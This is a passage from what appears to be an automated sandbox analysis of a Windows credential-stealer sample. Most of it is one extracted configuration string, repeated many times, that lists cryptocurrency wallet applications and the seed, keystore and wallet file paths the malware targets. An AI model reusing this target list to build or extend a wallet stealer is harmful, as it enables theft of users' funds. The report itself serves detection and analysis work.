Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
